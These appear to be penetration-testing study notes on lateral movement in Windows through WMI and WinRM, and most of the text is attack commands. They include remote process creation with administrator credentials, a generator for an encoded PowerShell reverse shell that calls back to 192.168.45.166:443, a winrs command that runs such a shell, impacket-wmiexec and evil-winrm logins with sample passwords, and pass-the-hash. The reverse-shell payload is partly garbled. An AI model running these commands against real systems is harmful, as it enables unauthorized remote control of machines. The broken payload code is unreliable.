WMI:

WMI Theory

• Windows Management Instrumentation
• Capable of creating processes via the Create mtehod from the Win32_process class.
• Communicates through Remote Procedure Calls (RPC) on port 135 for remote access, and higher ports (19152-65535) for session data.
• All spawned processes are run in session 0
• If ReturnValue == 0, the process has succeeded!

WMI Remote Process with WMIC

• WMIC utility was recently deprecated, but is used to create processes on a remote target using an Administrator user.

wmic /node:<ip> /user:<adminuser> /password:<password> process call create "<process-to-create>"

WMI Reverse Shell with Powershell

1. Generate reverse shell using python script:

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.166",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close('

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)

2. Set up Powershell script and set $username, $password and $command:

$username = '<adminuser>';
$password = '<password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <ip> -Credential $credential -SessionOption $Options 
$command = '<generated-reverse-shell-payload>';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

$session = New-Cimsession -ComputerName 172.16.189.10 -Credential $credential -SessionOption $Options 

3. Start netcat listener, encode and win!

WMI Remote Shell with Impacket:

sudo /usr/bin/impacket-wmiexec joe:Flowers1@172.16.189.11

WinRM:

WinRM Theory

• Alternative method to WMI for remote management
• Microsoft version of the WS-Management protocol
• Exchanges XML messages over HTTP (port 5985) and HTTPS (port 5986)
• Implemented in numerous built-in utilities such as winrs

WinRM Remote Shell with Evil-WinRM:

evil-winrm -i 192.168.X.X -u <user> -p "qwertqwertqwert123\!\!"

• Or -H followed by NT-hash!!

WinRM Remote Code Execution with WinRS

• Only works for domain users who are Administrators or part of "Remote Management Users".

winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

WinRM Reverse Shell with WinRS

winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

WinRM Remote Shell with Powershell:

1. Create session:

$username = '<user>';
$password = '<password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <target-ip> -Credential $credential

2. Enter session:

Enter-PSSession 1